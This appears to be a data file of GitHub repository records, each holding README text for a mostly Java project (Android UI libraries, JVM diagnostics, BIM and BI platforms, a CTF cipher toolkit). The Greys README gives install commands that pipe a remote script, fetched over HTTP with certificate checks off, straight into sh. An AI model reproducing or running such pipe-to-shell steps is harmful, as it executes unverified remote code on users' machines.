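          @Override
          public void afterUpdate(EntryEvent<String, String> event) {
            System.out.format("updated %s = %s%n", event.getKey(), event.getNewValue());
          }
        })
        .create("hello");

    region.put("1", "Hello again");
    cache.close();
  }
}
```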
0
rubensousa/GravitySnapHelper
A SnapHelper that snaps a RecyclerView to an edge.
recyclerview snapping
# GravitySnapHelper A SnapHelper that snaps a RecyclerView to an edge. ## Setup Add this to your build.gradle: ```groovy implementation 'com.github.rubensousa:gravitysnaphelper:2.2.2' ``` ## How to use You can either create a GravitySnapHelper, or use GravitySnapRecyclerView. If you want to use GravitySnapHelper directly, you just need to create it and attach it to your RecyclerView: ```kotlin val snapHelper = GravitySnapHelper(Gravity.START) snapHelper.attachToRecyclerView(recyclerView) ``` If you want to use GravitySnapRecyclerView, you can use the following xml attributes for customisation: ```xml <attr name="snapGravity" format="enum"> <attr name="snapEnabled" format="boolean" /> <attr name="snapLastItem" format="boolean" /> <attr name="snapToPadding" format="boolean" /> <attr name="snapScrollMsPerInch" format="float" /> <attr name="snapMaxFlingSizeFraction" format="float" /> ``` Example: ```xml <com.github.rubensousa.gravitysnaphelper.GravitySnapRecyclerView android:id="@+id/recyclerView" android:layout_width="match_parent" android:layout_height="wrap_content" app:snapGravity="start" /> ``` ## Start snapping ```kotlin val snapHelper = GravitySnapHelper(Gravity.START) snapHelper.attachToRecyclerView(recyclerView) ``` <img src="screens/snap_start.gif" width=350></img> ## Center snapping ```kotlin val snapHelper = GravitySnapHelper(Gravity.CENTER) snapHelper.attachToRecyclerView(recyclerView) ``` <img src="screens/snap_center.gif" width=350></img> ## Limiting fling distance If you use **setMaxFlingSizeFraction** or **setMaxFlingDistance** you can change the maximum fling distance allowed. <img src="screens/snap_fling.gif" width=350></img> ## With decoration <img src="screens/snap_decoration.gif" width=350></img> ## Features 1. **setMaxFlingDistance** or **setMaxFlingSizeFraction** - changes the max fling distance allowed. 2. **setScrollMsPerInch** - changes the scroll speed. 3. **setGravity** - changes the gravity of the SnapHelper. 4. **setSnapToPadding** - enables snapping to padding (default is false) 5. **smoothScrollToPosition** and **scrollToPosition** 6. RTL support out of the box ## Nested RecyclerViews Take a look at these blog posts if you're using nested RecyclerViews 1. [Improving scrolling behavior of nested RecyclerViews](https://rubensousa.com/2019/08/16/nested_recyclerview_part1/) 2. [Saving scroll state of nested RecyclerViews](https://rubensousa.com/2019/08/27/saving_scroll_state_of_nested_recyclerviews/) ## License Copyright 2018 The Android Open Source Project Copyright 2019 Rúben Sousa Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
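As a small addition to the Features list above, here is a minimal Java sketch combining the fling-limit and scroll-speed options before attaching the helper (the setter names come straight from the Features section; the `recyclerView` instance is assumed to exist in your screen):

```java
import android.view.Gravity;
import androidx.recyclerview.widget.RecyclerView;
import com.github.rubensousa.gravitysnaphelper.GravitySnapHelper;

public class SnapSetup {
    public static void attach(RecyclerView recyclerView) {
        GravitySnapHelper snapHelper = new GravitySnapHelper(Gravity.START);
        // Limit each fling to at most one full RecyclerView width/height.
        snapHelper.setMaxFlingSizeFraction(1f);
        // Slow the snap scroll down slightly (larger = slower).
        snapHelper.setScrollMsPerInch(120f);
        // Snap to the RecyclerView's padding instead of its edge.
        snapHelper.setSnapToPadding(true);
        snapHelper.attachToRecyclerView(recyclerView);
    }
}
```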
0
oldmanpushcart/greys-anatomy
A Java diagnostics tool
diagnosis greys jvmti troubleshooting
![LOGO icon](https://raw.githubusercontent.com/oldmanpushcart/images/master/greys/greys-logo-readme.png)

> Why does the production system keep failing? Why does the database keep getting hit? Why do business calls fail again and again? Behind the case of the chained exception stack traces, which call is the real culprit? And what hides behind the sudden avalanche of hundreds of servers: a twist of the software, or the fall of the hardware? Let us walk you through Greys, the Java online troubleshooting tool.

# Documentation

* [About](https://github.com/oldmanpushcart/greys-anatomy/wiki/Home)
* [Installation](https://github.com/oldmanpushcart/greys-anatomy/wiki/installing)
* [Getting started](https://github.com/oldmanpushcart/greys-anatomy/wiki/Getting-Started)
* [FAQ](https://github.com/oldmanpushcart/greys-anatomy/wiki/FAQ)
* [Changelog](https://github.com/oldmanpushcart/greys-anatomy/wiki/Chronicle)
* [Detailed docs](https://github.com/oldmanpushcart/greys-anatomy/wiki/greys-pdf)
* [English-README](https://github.com/oldmanpushcart/greys-anatomy/blob/master/Greys_en.md)

# Installation

- Remote install

```shell
curl -sLk http://ompc.oss.aliyuncs.com/greys/install.sh|sh
```

- Remote install (short link)

```shell
curl -sLk http://t.cn/R2QbHFc|sh
```

## Latest version

### **VERSION :** 1.7.6.6

1. JDK 9 support
2. The greys.sh script now supports tar extraction (some machines have no unzip); unzip remains the default
3. Fixed issue #219

### Version numbering

`major`.`architecture`.`feature`.`bugfix`

* major version: a fundamental upgrade of the program architecture. For example, the jump from 0.1 to 1.0 took the software from a single-machine tool to a socket-based multi-machine client/server, and settled what Greys is: a Java counterpart of HouseMD, but stronger than its predecessors.

* architecture version: a major redesign of the architecture that does not change what users take the software to be.

* feature version: new commands and features.

* bugfix version: bug fixes and hardening of the current version.

- No backward compatibility is promised across `major` and `architecture` versions, i.e. a `0.1` client is not guaranteed to work against a `1.0` server.
- Incompatible `feature` versions are called out in the release notes.
- `bugfix` releases are guaranteed to be backward compatible.

# Maintainers

* [李夏驰 (Li Xiachi)](http://www.weibo.com/vlinux)
* [姜小逸又胖了 (Jiang Xiaoyi)](http://weibo.com/chengtd)

# Building

- Open a terminal

```shell
git clone git@github.com:oldmanpushcart/greys-anatomy.git
cd greys-anatomy/bin
./greys-packages.sh
```

- Running

The release file for the current version is generated under `target/`; for example, for version `1.7.0.4` the file is `target/greys-1.7.0.4-bin.zip`.

A local build also installs the freshly built version on the machine, so once compilation finishes the tool is already installed locally.

# Afterword

## Reflections

I have been writing and maintaining this tool for five years, during which Greys was refactored from `0.1` all the way to today's `1.7`. Along the way I received a great deal of help and advice, and by the end of the year I plan to release `2.0`, which will open up Greys' underlying wire protocol and support websocket access.

I have not shared much of my years of troubleshooting experience, nor the private frustrations of a Java programmer; all of it went into this tool's commands. I hope this distilled experience saves those who need it a few detours, and I very much look forward to your feedback, which makes me happy and gives me a sense of accomplishment.

## Help us

Greys needs everyone's help to grow.

- **Share your experience with Greys**

I would love to hear usage feedback and experience write-ups. If you have one, please scrub any sensitive information from the article and email it to me at [oldmanpushcart@gmail.com](mailto:oldmanpushcart@gmail.com), and I will share it with more peers.

- **Help improve the code or docs**

However good a piece of software is, it needs detailed help documentation; however polished, it has pitfalls to fill. My energy is very limited these days, and I hope for everyone's joint help.

- **If you like this tool, feel free to tip a cup of coffee**

Well, to be honest, I'm counting on this to buy a Maserati... that's a joke, of course~ Your encouragement is my motivation; the amount doesn't matter. What matters is the goodwill I receive from it, which keeps me moving forward.

![alipay](https://raw.githubusercontent.com/oldmanpushcart/images/master/alipay-vlinux.png)

## Contact

Colleagues at Alibaba can find me on Wangwang; anyone outside Alibaba can reach me via [my Weibo](http://weibo.com/vlinux). Heavy snow is falling in Hangzhou tonight; West Lake should be beautiful tomorrow. Good night, everyone.

菜鸟 (Cainiao) - 杜琨 (Du Kun) (dukun@alibaba-inc.com)
0
opensourceBIM/BIMserver
The open source BIMserver platform
bim bim-applications bim-bots bim-server bimserver buildingsmart ifc java openbim
BIMserver
=========

The Building Information Model server (short: BIMserver) enables you to store and manage the information of a construction (or other building-related) project. Data is stored in the open data standard IFC. The BIMserver is not a file server; it uses a model-driven architecture approach. This means that IFC data is stored as objects. You could see BIMserver as an IFC database, with special extra features like model checking, versioning, project structures, merging, etc. The main advantage of this approach is the ability to query, merge and filter the BIM model and generate IFC output (i.e. files) on the fly. Thanks to its multi-user support, multiple people can work on their own part of the dataset, while the complete dataset is updated on the fly. Other users can get notifications when the model (or a part of it) is updated.

BIMserver is built for developers. We've got a great wiki on https://github.com/opensourceBIM/BIMserver/wiki and are very active in supporting developers on https://github.com/opensourceBIM/BIMserver/issues

(C) Copyright by the contributors / BIMserver.org

Licence: GNU Affero General Public License, version 3 (see http://www.gnu.org/licenses/agpl-3.0.html)

Beware: this project makes intensive use of several other projects with different licenses. Some plugins and libraries are published under a different license.
0
patric-r/jvmtop
Java monitoring for the command-line, profiler included
null
<b>jvmtop</b> is a lightweight console application to monitor all accessible, running jvms on a machine.<br> In a top-like manner, it displays <a href='https://github.com/patric-r/jvmtop/blob/master/doc/ExampleOutput.md'>JVM internal metrics</a> (e.g. memory information) of running java processes.<br> <br> Jvmtop does also include a <a href='https://github.com/patric-r/jvmtop/blob/master/doc/ConsoleProfiler.md'>CPU console profiler</a>.<br> <br> It's tested with different releases of Oracle JDK, IBM JDK and OpenJDK on Linux, Solaris, FreeBSD and Windows hosts.<br> Jvmtop requires a JDK - a JRE will not suffice.<br> <br> Please note that it's currently in an alpha state -<br> if you experience an issue or need further help, please <a href='https://github.com/patric-r/jvmtop/issues'>let us know</a>.<br> <br> Jvmtop is open-source. Checkout the <a href='https://github.com/patric-r/jvmtop'>source code</a>. Patches are very welcome!<br> <br> Also have a look at the <a href='https://github.com/patric-r/jvmtop/blob/master/doc/Documentation.md'>documentation</a> or at a <a href='https://github.com/patric-r/jvmtop/blob/master/doc/ExampleOutput.md'>captured live-example</a>.<br> ``` JvmTop 0.8.0 alpha amd64 8 cpus, Linux 2.6.32-27, load avg 0.12 https://github.com/patric-r/jvmtop PID MAIN-CLASS HPCUR HPMAX NHCUR NHMAX CPU GC VM USERNAME #T DL 3370 rapperSimpleApp 165m 455m 109m 176m 0.12% 0.00% S6U37 web 21 11272 ver.resin.Resin [ERROR: Could not attach to VM] 27338 WatchdogManager 11m 28m 23m 130m 0.00% 0.00% S6U37 web 31 19187 m.jvmtop.JvmTop 20m 3544m 13m 130m 0.93% 0.47% S6U37 web 20 16733 artup.Bootstrap 159m 455m 166m 304m 0.12% 0.00% S6U37 web 46 ``` <hr /> <h3>Installation</h3> Click on the <a href="https://github.com/patric-r/jvmtop/releases"> releases tab</a>, download the most recent tar.gz archive. Extract it, ensure that the `JAVA_HOME` environment variable points to a valid JDK and run `./jvmtop.sh`.<br><br> Further information can be found in the [INSTALL file](https://github.com/patric-r/jvmtop/blob/master/INSTALL) <h3>08/14/2013 jvmtop 0.8.0 released</h3> <b>Changes:</b> <ul><li>improved attach compatibility for all IBM jvms<br> </li><li>fixed wrong CPU/GC values for IBM J9 jvms<br> </li><li>in case of unsupported heap size metric retrieval, n/a will be displayed instead of 0m<br> </li><li>improved argument parsing, support for short-options, added help (pass <code>--help</code>), see <a href='https://github.com/patric-r/jvmtop/issues/28'>issue #28</a> (now using the great <a href='http://pholser.github.io/jopt-simple'>jopt-simple</a> library)<br> </li><li>when passing the <code>--once</code> option, terminal will not be cleared anymore (see <a href='https://github.com/patric-r/jvmtop/issues/27'>issue #27</a>)<br> </li><li>improved shell script for guessing the path if a <code>JAVA_HOME</code> environment variable is not present (thanks to <a href='https://groups.google.com/forum/#!topic/jvmtop-discuss/KGg_WpL_yAU'>Markus Kolb</a>)</li></ul> <a href='https://github.com/patric-r/jvmtop/blob/master/doc/Changelog.md'>Full changelog</a> <hr /> In <a href='https://github.com/patric-r/jvmtop/blob/master/doc/ExampleOutput.md'>VM detail mode</a> it shows you the top CPU-consuming threads, beside detailed metrics:<br> <br> <br> ``` JvmTop 0.8.0 alpha amd64, 4 cpus, Linux 2.6.18-34 https://github.com/patric-r/jvmtop PID 3539: org.apache.catalina.startup.Bootstrap ARGS: start VMARGS: -Djava.util.logging.config.file=/home/webserver/apache-tomcat-5.5[...] VM: Sun Microsystems Inc. 
Java HotSpot(TM) 64-Bit Server VM 1.6.0_25 UP: 869:33m #THR: 106 #THRPEAK: 143 #THRCREATED: 128020 USER: webserver CPU: 4.55% GC: 3.25% HEAP: 137m / 227m NONHEAP: 75m / 304m TID NAME STATE CPU TOTALCPU BLOCKEDBY 25 http-8080-Processor13 RUNNABLE 4.55% 1.60% 128022 RMI TCP Connection(18)-10.101. RUNNABLE 1.82% 0.02% 36578 http-8080-Processor164 RUNNABLE 0.91% 2.35% 36453 http-8080-Processor94 RUNNABLE 0.91% 1.52% 27 http-8080-Processor15 RUNNABLE 0.91% 1.81% 14 http-8080-Processor2 RUNNABLE 0.91% 3.17% 128026 JMX server connection timeout TIMED_WAITING 0.00% 0.00% ``` <a href='https://github.com/patric-r/jvmtop/issues'>Pull requests / bug reports</a> are always welcome.<br> <br>
0
datageartech/datagear
A data visualization and analysis platform; freely build any data dashboard you want
bi business-intelligence chart data-analysis data-analytics data-visualization echarts
<p align="center"> <a href="http://www.datagear.tech"><img src="datagear-web/src/main/resources/org/datagear/web/static/theme/blue/image/logo.png" alt="DataGear" /></a> </p> <h1 align="center"> 数据可视化分析平台 </h1> <h2 align="center"> 自由制作任何您想要的数据看板 </h2> # 简介 DataGear是一款开源免费的数据可视化分析平台,自由制作任何您想要的数据看板,支持接入SQL、CSV、Excel、HTTP接口、JSON等多种数据源。 ## [DataGear 4.7.0 已发布,欢迎官网下载使用!](http://www.datagear.tech) ## [DataGear专业版 1.0.0 正式发布,欢迎试用!](http://www.datagear.tech/pro/) # 特点 - 友好接入的数据源 <br>支持运行时接入任意提供JDBC驱动的数据库,包括MySQL、Oracle、PostgreSQL、SQL Server等关系数据库,以及Elasticsearch、ClickHouse、Hive等大数据引擎 - 多样动态的数据集 <br>支持创建SQL、CSV、Excel、HTTP接口、JSON数据集,并可设置为动态的参数化数据集,可定义文本框、下拉框、日期框、时间框等类型的数据集参数,灵活筛选满足不同业务需求的数据 - 强大丰富的数据图表 <br>数据图表可聚合绑定多个不同格式的数据集,轻松定义同比、环比图表,内置折线图、柱状图、饼图、地图、雷达图、漏斗图、散点图、K线图、桑基图等70+开箱即用的图表,并且支持自定义图表配置项,支持编写和上传自定义图表插件 - 自由开放的数据看板 <br>数据看板采用原生的HTML网页作为模板,支持导入任意HTML网页,支持以可视化方式进行看板设计和编辑,也支持使用JavaScript、CSS等web前端技术自由编辑看板源码,内置丰富的API,可制作图表联动、数据钻取、异步加载、交互表单等个性化的数据看板。 # 功能 ![screenshot/architecture.png](screenshot/architecture.png) # 官网 [http://www.datagear.tech](http://www.datagear.tech) # 界面 数据源管理 ![screenshot/datasource-manage.png](screenshot/datasource-manage.png) SQL数据集 ![screenshot/add-sql-dataset.png](screenshot/add-sql-dataset.png) 看板编辑 ![screenshot/dashboard-visual-mode.gif](screenshot/dashboard-visual-mode.gif) 看板展示 ![screenshot/template-006-dg.png](screenshot/template-006-dg.png) 看板展示-图表联动 ![screenshot/dashboard-map-chart-link.gif](screenshot/dashboard-map-chart-link.gif) 看板展示-实时图表 ![screenshot/dashboard-time-series-chart.gif](screenshot/dashboard-time-series-chart.gif) 看板展示-钻取 ![screenshot/dashboard-map-chart-hierarchy.gif](screenshot/dashboard-map-chart-hierarchy.gif) 看板展示-表单 ![screenshot/dashboard-form.gif](screenshot/dashboard-form.gif) 看板展示-联动异步加载图表 ![screenshot/dashboard-link-load-chart.gif](screenshot/dashboard-link-load-chart.gif) # 技术栈(前后端一体) - 后端 <br> Spring Boot、Mybatis、Freemarker、Derby、Jackson、Caffeine、Spring Security - 前端 <br> jQuery、Vue3、PrimeVue、CodeMirror、ECharts、DataTables # 模块介绍 - datagear-analysis <br>数据分析底层模块,定义数据集、图表、看板API - datagear-connection <br>数据库连接支持模块,定义可从指定目录加载JDBC驱动、新建连接的API - datagear-dataexchange <br>数据导入/导出底层模块,定义导入/导出指定数据源数据的API - datagear-management <br>系统业务服务模块,定义数据源、数据分析等功能的服务层API - datagear-meta <br>数据源元信息底层模块,定义解析指定数据源表结构的API - datagear-persistence <br>数据源数据管理底层模块,定义读取、编辑、查询数据源表数据的API - datagear-util <br>系统常用工具集模块 - datagear-web <br>系统web模块,定义web控制器、操作页面 - datagear-webapp <br>系统web应用模块,定义程序启动类 # 依赖 Java 8+ Servlet 3.1+ # 编译 ## 准备单元测试环境 1. 安装`MySQL-8.0`数据库,并将`root`用户的密码设置为:`root`(或者修改`test/config/jdbc.properties`配置) 2. 新建测试数据库,名称取为:`dg_test` 3. 使用`test/sql/test-mysql.sql`脚本初始化`dg_test`库 ## 执行编译命令 mvn clean package 或者,也可不准备单元测试环境,直接执行如下编译命令: mvn clean package -DskipTests 编译完成后,将在`datagear-webapp/target/datagear-[version]-packages/`内生成程序包。 # 调试 1. 将`datagear`以maven工程导入至IDE工具 2. 以调试模式运行`datagear-webapp`模块的启动类`org.datagear.webapp.DataGearApplication` 3. 
Open a browser and visit: `http://localhost:50401`

## Debugging notes

Before debugging a development branch (`dev-*`), back up the DataGear working directory (`[user home]/.datagear`) first, because development branches modify the working directory on startup, which may prevent previously used stable releases, and stable releases published later, from starting properly.

On startup, the system automatically upgrades the built-in database (a Derby database under `[user home]/.datagear/derby`) according to the current version number, and once that succeeds it will not run again on the next startup. If you hit database errors while debugging, inspect the

    datagear-management/src/main/resources/org/datagear/management/ddl/datagear.sql

file, find the SQL statements that need to be applied, and run them manually.

Then, manually run the following SQL statement to update the system version number:

    UPDATE DATAGEAR_VERSION SET VERSION_VALUE='current version'

For example, for version `4.6.0`, run:

    UPDATE DATAGEAR_VERSION SET VERSION_VALUE='4.6.0'

The system ships a simple utility class, `org.datagear.web.util.DerbySqlClient`, for running SQL statements against the built-in database; it can be run directly from the IDE. Note: stop the DataGear program before running it.

# Copyright and license

Copyright 2018-2023 datagear.tech

DataGear is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

DataGear is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.

You should have received a copy of the GNU Lesser General Public License along with DataGear. If not, see <https://www.gnu.org/licenses/>.
0
aaberg/sql2o
sql2o is a small library that makes it easy to convert the results of your SQL statements into objects. No ResultSet hacking required. Kind of like an ORM, but without the SQL-generation capabilities. Supports named parameters.
null
# sql2o

[![Github Actions Build](https://github.com/aaberg/sql2o/actions/workflows/pipeline.yml/badge.svg)](https://github.com/aaberg/sql2o/actions) [![Maven Central](https://img.shields.io/maven-central/v/org.sql2o/sql2o.svg)](https://search.maven.org/search?q=g:org.sql2o%20a:sql2o)

Sql2o is a small Java library with the purpose of making database interaction easy. When fetching data from the database, the ResultSet will automatically be filled into your POJO objects. Kind of like an ORM, but without the SQL generation capabilities.

Sql2o requires Java 7 or 8 to run. Java versions past 8 may work, but are currently not supported.

# Announcements

*2024-03-12* | [Sql2o 1.7.0 was released](https://github.com/aaberg/sql2o/discussions/365)

# Examples

Check out the [sql2o website](http://www.sql2o.org) for examples.

# Coding guidelines

When hacking sql2o, please follow [these coding guidelines](https://github.com/aaberg/sql2o/wiki/Coding-guidelines).
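To complement the pointer to the website, here is a minimal sketch of the typical sql2o flow. The `Task` POJO, the table and the H2 connection settings are assumptions for illustration; the `Sql2o`, `createQuery`, `addParameter` and `executeAndFetch` calls are the library's public API:

```java
import java.util.List;
import org.sql2o.Connection;
import org.sql2o.Sql2o;

public class Sql2oExample {

    // Hypothetical POJO; field names match the selected column names.
    public static class Task {
        public long id;
        public String description;
    }

    public static void main(String[] args) {
        // Assumed connection settings for a local in-memory database.
        Sql2o sql2o = new Sql2o("jdbc:h2:mem:test", "sa", "");

        try (Connection con = sql2o.open()) {
            // Named parameter :done instead of positional JDBC placeholders.
            List<Task> tasks = con
                    .createQuery("SELECT id, description FROM tasks WHERE done = :done")
                    .addParameter("done", false)
                    .executeAndFetch(Task.class);
            System.out.println(tasks.size() + " open tasks");
        }
    }
}
```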
0
hackware1993/MagicIndicator
A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip —— 强大、可定制、易扩展的 ViewPager 指示器框架。是ViewPagerIndicator、TabLayout、PagerSlidingTabStrip的最佳替代品。支持角标,更支持在非ViewPager场景下使用(使用hide()、show()切换Fragment或使用setVisibility切换FrameLayout里的View等),http://www.jianshu.com/p/f3022211821c
indicator pagerslidingtabstrip tablayout viewpager viewpagerindicator
# MagicIndicator

A powerful, customizable and extensible ViewPager indicator framework, the best alternative to ViewPagerIndicator, TabLayout and PagerSlidingTabStrip.

[Flutter_ConstraintLayout](https://github.com/hackware1993/Flutter_ConstraintLayout) Another very good open source project of mine.

**I have developed the world's fastest general purpose sorting algorithm, which is on average 3 times faster than Quicksort and up to 20 times faster**, [ChenSort](https://github.com/hackware1993/ChenSort)

[![](https://jitpack.io/v/hackware1993/MagicIndicator.svg)](https://jitpack.io/#hackware1993/MagicIndicator) [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MagicIndicator-green.svg?style=true)](https://android-arsenal.com/details/1/4252) [![Codewake](https://www.codewake.com/badges/ask_question.svg)](https://www.codewake.com/p/magicindicator)

![magicindicator.gif](https://github.com/hackware1993/MagicIndicator/blob/main/magicindicator.gif)

# Usage

A few simple steps are all it takes to integrate **MagicIndicator**:

1. check out **MagicIndicator**, which contains the source code and demo
2. import module **magicindicator** and add the dependency:

```groovy
implementation project(':magicindicator')
```

**or**

```groovy
repositories {
    ...
    maven { url "https://jitpack.io" }
}

dependencies {
    ...
    implementation 'com.github.hackware1993:MagicIndicator:1.6.0' // for support lib
    implementation 'com.github.hackware1993:MagicIndicator:1.7.0' // for androidx
}
```

3. add **MagicIndicator** to your layout xml:

```xml
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:orientation="vertical"
    tools:context="net.lucode.hackware.magicindicatordemo.MainActivity">

    <net.lucode.hackware.magicindicator.MagicIndicator
        android:id="@+id/magic_indicator"
        android:layout_width="match_parent"
        android:layout_height="40dp" />

    <android.support.v4.view.ViewPager
        android:id="@+id/view_pager"
        android:layout_width="match_parent"
        android:layout_height="0dp"
        android:layout_weight="1" />
</LinearLayout>
```

4. find **MagicIndicator** through code, initialize it:

```java
MagicIndicator magicIndicator = (MagicIndicator) findViewById(R.id.magic_indicator);
CommonNavigator commonNavigator = new CommonNavigator(this);
commonNavigator.setAdapter(new CommonNavigatorAdapter() {

    @Override
    public int getCount() {
        return mTitleDataList == null ? 0 : mTitleDataList.size();
    }

    @Override
    public IPagerTitleView getTitleView(Context context, final int index) {
        ColorTransitionPagerTitleView colorTransitionPagerTitleView = new ColorTransitionPagerTitleView(context);
        colorTransitionPagerTitleView.setNormalColor(Color.GRAY);
        colorTransitionPagerTitleView.setSelectedColor(Color.BLACK);
        colorTransitionPagerTitleView.setText(mTitleDataList.get(index));
        colorTransitionPagerTitleView.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                mViewPager.setCurrentItem(index);
            }
        });
        return colorTransitionPagerTitleView;
    }

    @Override
    public IPagerIndicator getIndicator(Context context) {
        LinePagerIndicator indicator = new LinePagerIndicator(context);
        indicator.setMode(LinePagerIndicator.MODE_WRAP_CONTENT);
        return indicator;
    }
});
magicIndicator.setNavigator(commonNavigator);
```

5.
work with ViewPager:

```java
ViewPagerHelper.bind(magicIndicator, mViewPager);
```

**or** work with a Fragment container (switching Fragments via hide()/show()):

```java
mFragmentContainerHelper = new FragmentContainerHelper(magicIndicator);
// ...
mFragmentContainerHelper.handlePageSelected(pageIndex); // invoke when switching Fragments
```

# Extend

**MagicIndicator** can be easily extended:

1. implement **IPagerTitleView** to customize the tab:

```java
public class MyPagerTitleView extends View implements IPagerTitleView {

    public MyPagerTitleView(Context context) {
        super(context);
    }

    @Override
    public void onLeave(int index, int totalCount, float leavePercent, boolean leftToRight) {
    }

    @Override
    public void onEnter(int index, int totalCount, float enterPercent, boolean leftToRight) {
    }

    @Override
    public void onSelected(int index, int totalCount) {
    }

    @Override
    public void onDeselected(int index, int totalCount) {
    }
}
```

2. implement **IPagerIndicator** to customize the indicator:

```java
public class MyPagerIndicator extends View implements IPagerIndicator {

    public MyPagerIndicator(Context context) {
        super(context);
    }

    @Override
    public void onPageSelected(int position) {
    }

    @Override
    public void onPageScrolled(int position, float positionOffset, int positionOffsetPixels) {
    }

    @Override
    public void onPageScrollStateChanged(int state) {
    }

    @Override
    public void onPositionDataProvide(List<PositionData> dataList) {
    }
}
```

3. use **CommonPagerTitleView** to load a custom layout xml.

Now, enjoy yourself!

See extensions in [*app/src/main/java/net/lucode/hackware/magicindicatordemo/ext*](https://github.com/hackware1993/MagicIndicator/tree/master/app/src/main/java/net/lucode/hackware/magicindicatordemo/ext), more extensions are being added...

# Who developed?

hackware1993@gmail.com cfb1993@163.com

Q&A <a target="_blank" href="http://shang.qq.com/wpa/qunwpa?idkey=7ac5bef0321c7afa7e9fc4e94175fa36f413e3330c82e828b1743274af8a64d7"><img border="0" src="http://pub.idqqimg.com/wpa/images/group.png" alt="MagicIndicator交流群" title="MagicIndicator交流群"></a>

An intermittent perfectionist. Visit [My Blog](http://hackware.lucode.net) for more articles about MagicIndicator.

Subscribe to my WeChat official account to get the latest MagicIndicator news in time. High-quality, distinctive and thoughtful Flutter and Android articles will also be shared there.

![official_account.webp](https://github.com/hackware1993/weiV/blob/master/official_account.webp?raw=true)

# License

```
MIT License

Copyright (c) 2016 hackware1993

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
```

# More

Read this far? Why not give a star... hey, don't go, you haven't starred yet...
0
0Chencc/CTFCrackTools
China's first CTF tools framework, built to help CTF players crack challenges quickly
ctf ctf-tools framework java jython kotlin-java python websecurity
# CTFcrackTools-V4.0

[![Build Status](https://travis-ci.org/0Chencc/CTFCrackTools.svg?branch=master)](https://travis-ci.org/0Chencc/CTFCrackTools) [![](https://img.shields.io/github/v/release/0chencc/ctfcracktools?label=LATEST%20VERSION)](https://github.com/0Chencc/CTFCrackTools/releases/latest) [![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://raw.githubusercontent.com/0Chencc/CTFCrackTools/master/doc/LICENSE) [![download](https://img.shields.io/github/downloads/0chencc/ctfcracktools/total)](https://github.com/0Chencc/CTFCrackTools/releases) [![language](https://img.shields.io/badge/Language-Java/Kotlin-orange.svg)](https://github.com/0Chencc/CTFCrackTools/)

Author: 林晨 (0chen)

米斯特安全 (Acmesec) official site: http://www.acmesec.cn/

This tool can now be imported as a Burp plugin; repository: [DaE](https://github.com/0Chencc/DaE)

[Buy me a coffee ☕️](#donations)

## Troubleshooting

See: [https://github.com/0Chencc/CTFCrackTools/wiki/FAQ](https://github.com/0Chencc/CTFCrackTools/wiki/FAQ)

## UI

Main page ![mark](img/use.gif)

Adding a plugin ![mark](img/plugin.gif)

## About the framework

Developed in a mix of Kotlin and Java, this is probably China's first tool framework built for CTF.

It can be used for Crypto, Misc and more in CTF, and ships with today's mainstream ciphers (including but not limited to the Vigenère cipher, the Caesar cipher, the rail fence cipher...).

Users can write their own plugins, though only in Python, and writing one is extremely simple. (Because of Jython itself, Python 3 cannot be supported for now.) When importing a plugin, always make sure the Jython file has been loaded.

We bundle some plugins for users under [现成插件](https://github.com/0Chencc/CTFCrackTools/tree/master/%E7%8E%B0%E6%88%90%E6%8F%92%E4%BB%B6).

The project keeps being strengthened; this rewrite kept only part of the core code and rebuilt the UI and optimization code, so the framework supports more features.

Project: [https://github.com/0Chencc/CTFCrackTools](https://github.com/0Chencc/CTFCrackTools)

Download compiled builds: [releases](https://github.com/0Chencc/CTFCrackTools/releases/)

## Writing plugins

![plugin](img/plugin.gif)

```Python
#-*- coding:utf-8 -*-
# a single-key plugin demo
def main(input,a):
    return 'input is %s,key is %s'%(input,a)

# we want to store plugin developers' information in the program,
# so author_info must be defined to register it
def author_info():
    info = {
        "author":"0chen",
        "name":"test_version",
        "key":["a"],
        "describe":"plugin describe"
    }
    return info
```

Now let's go through how these plugins are used, i.e. how the framework calls them.

**Function:** main

**Description:** the function the program calls when it invokes the plugin.

Definition:

```python
def main(input):
    return 'succ'
```

**Function:** author_info

**Description:** we want to store plugin developers' information in the program, so author_info must be defined to register it.

**author:** author information

**name:** plugin name

**key:** some ciphers need a key, sometimes several, so key information can be registered; the program pops up an input box for each key when the plugin is invoked.

**describe:** the plugin description. Because of Python 2, Chinese support seems incomplete, so describing in English is recommended.

Definition:

```python
def author_info():
    info = {
        "author":"0chen",
        "name":"test_version",
        "key":["a"],
        "describe":"plugin describe"
    }
    return info
```

**Tool invocation simply passes data in through def main(input) and reads back the returned data.**

```Python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def vigenereDecrypto(ciphertext,key):
